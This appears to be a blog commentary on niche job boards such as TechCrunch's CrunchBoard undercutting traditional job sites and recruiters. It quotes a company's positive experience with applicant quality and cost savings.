The best recent example of a typical industry starting to be overtaken by smaller startups is the online job search market. Typically, these areas have been dominated by sites like Monster or Workopolis. These sites are well known and established; however, recently niche job boards like those at 37 signals and TechCrunch have launched, with positive results. The idea behind these job boards seems, at first, the opposite of what would be desired – they are only known by a select group of individuals, typically those who visited the sites before the job board launched.

But that’s just the advantage – not everyone knows, so not just anyone applies to the jobs listed there, producing a higher quality of job applicants. This, in turn, makes it much easier for companies to find good people, thus cutting down on their costs, saving them money. This, of course, reduces the amount of money being pumped into this industry. Take this one comment about the TechCrunch job board (called the CrunchBoard):

We (photobucket) had posted 3 jobs on CrunchBoard and have had a positive experience thus far. We are getting less resume’s than maybe a monster or dice, but the ones we get are much more qualified. I’d be surprised if we don’t fill at least one of these positions in the coming weeks from a CrunchBoard referral. A few hundred bucks sure beats the $20k or so a recruiter will get you for.

Going from spending $20 K to less than $1 K certainly amounts to huge savings, and as more and more companies learn about this, you can bet they’ll be at least partially switching over to this model instead of traditional recruitment practices. This is really the same thing as the typical Internet user benefiting from all the free services out there – they save money, but at the cost of the previous business model suffering decreased revenues.

Whether these new job boards can maintain their level of high-quality applicants is one story, but what is sure to stay, is the fact that traditional industries are going to see their market value decreased because of low-cost Internet startups, for better or for worse.